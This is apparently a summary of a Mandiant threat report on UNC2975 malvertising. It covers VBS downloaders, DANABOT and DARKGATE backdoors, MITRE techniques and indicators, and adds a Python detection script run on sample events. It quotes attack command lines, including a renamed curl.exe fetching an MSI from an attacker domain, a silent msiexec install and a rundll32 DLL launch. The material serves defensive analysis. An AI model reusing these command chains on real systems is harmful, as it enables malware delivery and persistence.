Key Points
- UNC2975 ran malvertising campaigns (search and social) using “unclaimed money” themed landing pages to trick users into downloading ZIP archives containing VBS downloaders.
- The initial payloads were VBScript downloaders known as PAPERDROP (HTTPS) and PAPERTEAR (HTTP), which retrieved and executed second-stage payloads.
- Mandiant observed three primary delivery chains: VBS → renamed curl.exe → MSI (msiexec), VBS → renamed curl.exe → AutoIt executable and .au3 script, and VBS directly invoking msiexec to install a package.
- Secondary payloads included Delphi-based backdoors DANABOT and DARKGATE that used rundll32/msiexec, created Temp/AppData artifacts, modified proxy settings, and established persistence via Run keys or ServiceDll entries.
- Adversaries abused legitimate ad platforms and evaded detection via impersonation, cloaking, redirects, and targeted ad controls (geofencing and audience attributes).
- Mandiant provided detection opportunities, YARA rules, IOCs (domains, IPs, hashes), and collaborated with Google to remove malicious ad entries from the ads ecosystem.
MITRE Techniques
- [T1583.008] Acquire Infrastructure: Purchase Ads – used to place malicious advertisements in search/social results to lure victims (‘purchase advertisements [MITRE ATT&CK® Technique T1583.008] for malicious websites’).
- [T1189] Drive-by Compromise – ad-driven web pages delivered malicious ZIPs and scripts leading to infection (‘drive-by compromise [T1189]’).
- [T1059.005] Command and Scripting Interpreter: Windows Script Host – VBS payloads executed via WScript.exe to initiate download/execution (‘"C:\Windows\System32\WScript.exe" "C:\Users\<user>\AppData\Local\Temp\…\flast_d45534i.vbs"’).
- [T1105] Ingress Tool Transfer – downloaders and renamed curl binaries retrieved MSI/AUTOIT payloads from remote hosts (‘renamed cURL … to download the file SYUxEbPz.msi … https[:]//durham.soulcarelife[.]org’).
- [T1218.007] Signed Binary Proxy Execution: Msiexec – attackers used msiexec to quietly install malicious packages masquerading under benign extensions (‘msiexec /i C:\programData\HLWOIRTAA9P.bin /qn’).
- [T1218.011] Signed Binary Proxy Execution: Rundll32 – rundll32 was used to load malicious DLLs and launch backdoors in-memory (‘rundll32.exe C:\Users\<user>\AppData\Local\Temp\Oadsoophotfp.dll,start’).
- [T1036.008] Masquerading: Masquerade Task or Resource – installers and DLLs used benign-looking names/extensions to evade detection (‘masqueraded as a .bin file’).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – persistent Run key entries were created to relaunch backdoors (‘HKEY_USERS\<user>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Srfshu’).
- [T1543.003] Create or Modify System Process: Windows Service – DANABOT variants could install a service using ServiceDll to achieve persistence (‘use a new Windows service using the ServiceDll entry’).
- [T1053.005] Scheduled Task/Job: Scheduled Task – schtasks used to stop/start the Wininet Cache Task, potentially for Wininet API hooking (‘schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask’ and ‘schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask’).
- [T1562] Impair Defenses: Disable or Modify Tools – malware modified local proxy registry settings to manipulate traffic (‘HKEY_USERS\<user>\…\Internet Settings\ProxyServer | 127.0.0.1:15064’).
- [T1047] Windows Management Instrumentation – PAPERTEAR enumerated local processes via WMI before reporting to C2 (‘try to collect a list of running processes via Windows Management Instrumentation’).
- [T1204.002] User Execution: Malicious File – execution of VBS extracted from ZIP archives by user interaction led to script execution (‘Windows Script Host executing file in compressed archive’).
- [T1027] Obfuscated Files or Information – PAPERDROP used junk code, Sleep calls, and string concatenation to evade static analysis (‘junk code … Sleep calls … reverse-order string concatenation’).
- [T1036.003] Masquerade/Modify System Utilities – adversaries copied curl.exe to other filenames to masquerade and execute downloads (‘copy c:\windows\system32\curl.exe ihcbzhY.exe’).
- [T1566] Phishing (contextual mention) – phishing cited as one of the top initial access techniques in related trends (‘phishing [T1566]’).
- [T1091] Replication Through Removable Media (contextual mention) – referenced in broader trends as a common initial access method (‘replication through removable media [T1091]’).
Indicators of Compromise
- [Domain] UNC2975 campaign landing pages and droppers – www.claimprocessing[.]org, www.treasurydept[.]org, and 15+ other domains observed (e.g., plano.soulcarelife[.]org, infocatalog[.]pics).
- [IP Address] Infrastructure and C2 hosts – 47.252.45[.]173, 35.203.111[.]228, and 6+ additional IPs used for downloads/C2.
- [MD5 Hash] Malware samples and downloaders – 2c16eafd0023ea5cb8e9537da442047e (PAPERDROP Type I), 9f9c5a1269667171e1ac328f7f7f6cb3 (DARKGATE), and 4+ other hashes listed.
- [File Name] Dropped/installers and DLLs – CoreReborn32.bin (DANABOT launcher), Oadsoophotfp.dll (dropper DLL), SYUxEbPz.msi, and other MSI/VBS/AutoIt filenames observed.
In executing these attacks, the actor purchased targeted ads that redirected victims to spoofed “unclaimed funds” sites where users submitted names and downloaded ZIP “reports” containing VBS files. Those VBS files (PAPERDROP/PAPERTEAR) were run via WScript and either wrote payloads to disk or executed command-line one-liners that copied and invoked a renamed curl.exe to fetch MSI installers or AutoIt payloads, or directly invoked msiexec to install packages that dropped backdoor components.
Post-installation behavior included rundll32 loading of malicious DLLs to decompress/deobfuscate backdoor payloads, outbound TLS/TCP communications to C2 IPs, local loopback proxying, creation of randomly named .tmp and extensionless files in AppData/Temp, and persistence via Registry Run keys or ServiceDll-backed services. PAPERTEAR variants appended enumerated local processes to HTTP POSTs and executed commands directly from HTTP responses, while PAPERDROP favored writing payloads to disk before execution.
Detection guidance focuses on watching for WScript launching scripts from TEMP/Downloads after archive extraction, unusual msiexec installs from ProgramData with masquerading extensions, renamed copies of curl.exe invoked via cmd.exe, rundll32 loading DLLs from user AppData, schtasks operations targeting the Wininet Cache Task, and registry proxy/Run-key modifications. Blocking the identified domains/IPs, applying the provided YARA rules, and collaborating with ad platforms (as Mandiant did with Google) are effective mitigation steps.
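The following is an added example, not Mandiant's code or anything from the original report: a small Python triage routine that turns the detection guidance above into heuristics and runs them over constructed Sysmon-style process-creation and registry events. The Event field names, the user name "alice", the SID, the registry value data and the benign control event are assumptions of the example; the command-line shapes follow the ones quoted in the report.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One telemetry record. Fields loosely mirror Sysmon process-creation (EID 1)
    and registry value-set (EID 13) events; the names are the example's own."""
    kind: str                 # "process" or "registry"
    image: str = ""           # image path of the new process
    cmdline: str = ""         # full command line
    parent: str = ""          # parent image path
    original_name: str = ""   # OriginalFileName from the PE version resource
    reg_path: str = ""        # registry value path (registry events)
    reg_data: str = ""        # registry value data (registry events)


# User-writable locations the report names for staging scripts and DLLs.
USER_TEMP_OR_DOWNLOADS = re.compile(r"\\users\\[^\\]+\\(appdata\\local\\temp|downloads)\\", re.I)
USER_APPDATA_DLL = re.compile(r"\\users\\[^\\]+\\appdata\\[^\s,]*\.dll\b", re.I)
MSI_PACKAGE = re.compile(r'/i\s+"?([^\s"]+)', re.I)


def triage_process(ev: Event) -> list[str]:
    """Apply the process-level heuristics from the report's detection guidance."""
    hits = []
    img = ev.image.lower()
    cmd = ev.cmdline.lower()
    if img.endswith("\\wscript.exe") and USER_TEMP_OR_DOWNLOADS.search(cmd):
        hits.append("wscript: script launched from Temp/Downloads")
    if img.endswith("\\msiexec.exe"):
        m = MSI_PACKAGE.search(cmd)
        # Masquerading: package lives in ProgramData and does not carry a .msi extension
        if m and "\\programdata\\" in m.group(1) and not m.group(1).endswith(".msi"):
            hits.append("msiexec: non-.msi package from ProgramData")
    if img.endswith("\\cmd.exe") and re.search(r"\bcopy\b[^&|]*\\curl\.exe\s", cmd):
        hits.append("cmd: curl.exe copied under another name")
    if ev.original_name.lower() == "curl.exe" and not img.endswith("\\curl.exe"):
        hits.append("renamed curl.exe executed")
    if img.endswith("\\rundll32.exe") and USER_APPDATA_DLL.search(cmd):
        hits.append("rundll32: DLL loaded from user AppData")
    if img.endswith("\\schtasks.exe") and "wininet\\cachetask" in cmd:
        hits.append("schtasks: Wininet CacheTask stopped/started")
    return hits


def triage_registry(ev: Event) -> list[str]:
    """Apply the registry heuristics: loopback proxy and Run-key persistence."""
    hits = []
    path = ev.reg_path.lower()
    if path.endswith("\\internet settings\\proxyserver") and ev.reg_data.startswith("127.0.0.1:"):
        hits.append("registry: loopback proxy configured")
    if "\\currentversion\\run\\" in path:
        hits.append("registry: Run key persistence")
    return hits


def triage(ev: Event) -> list[str]:
    return triage_process(ev) if ev.kind == "process" else triage_registry(ev)


# Constructed sample telemetry (not real logs): command lines follow the shapes quoted
# in the report; the user name, SID, ZIP folder and Run-key data are made up.
SAMPLE_EVENTS = [
    Event("process", image=r"C:\Windows\System32\WScript.exe",
          cmdline=r'"C:\Windows\System32\WScript.exe" "C:\Users\alice\AppData\Local\Temp\Temp1_report.zip\flast_d45534i.vbs"',
          parent=r"C:\Windows\explorer.exe"),
    Event("process", image=r"C:\Windows\System32\cmd.exe",
          cmdline=r"cmd /c copy c:\windows\system32\curl.exe ihcbzhY.exe & ihcbzhY.exe -o SYUxEbPz.msi https://durham.soulcarelife.org/",
          parent=r"C:\Windows\System32\WScript.exe"),
    Event("process", image=r"C:\Users\alice\AppData\Local\Temp\ihcbzhY.exe",
          cmdline=r"ihcbzhY.exe -o SYUxEbPz.msi https://durham.soulcarelife.org/",
          original_name="curl.exe"),
    Event("process", image=r"C:\Windows\System32\msiexec.exe",
          cmdline=r"msiexec /i C:\programData\HLWOIRTAA9P.bin /qn"),
    Event("process", image=r"C:\Windows\System32\rundll32.exe",
          cmdline=r"rundll32.exe C:\Users\alice\AppData\Local\Temp\Oadsoophotfp.dll,start"),
    Event("process", image=r"C:\Windows\System32\schtasks.exe",
          cmdline=r"schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask"),
    Event("registry", reg_path=r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer",
          reg_data="127.0.0.1:15064"),
    Event("registry", reg_path=r"HKU\S-1-5-21-0-0-0-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Srfshu",
          reg_data=r"C:\Users\alice\AppData\Roaming\example.exe"),
    # Benign control: an ordinary .msi installed from Downloads should not fire.
    Event("process", image=r"C:\Windows\System32\msiexec.exe",
          cmdline=r'msiexec /i "C:\Users\alice\Downloads\tool-setup.msi"'),
]


def scan(events=SAMPLE_EVENTS) -> list[tuple[int, list[str]]]:
    """Return (event index, hits) for every event matching at least one heuristic."""
    return [(i, triage(e)) for i, e in enumerate(events) if triage(e)]


if __name__ == "__main__":
    for i, hits in scan():
        print(f"event {i}: {', '.join(hits)}")
```

The heuristics are deliberately narrow (a loopback ProxyServer value, a non-.msi package path under ProgramData, OriginalFileName of curl.exe under a different image name) so that each one maps to a single line of the report's guidance; in production they would be correlated by process tree rather than evaluated per event.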
Read more: https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors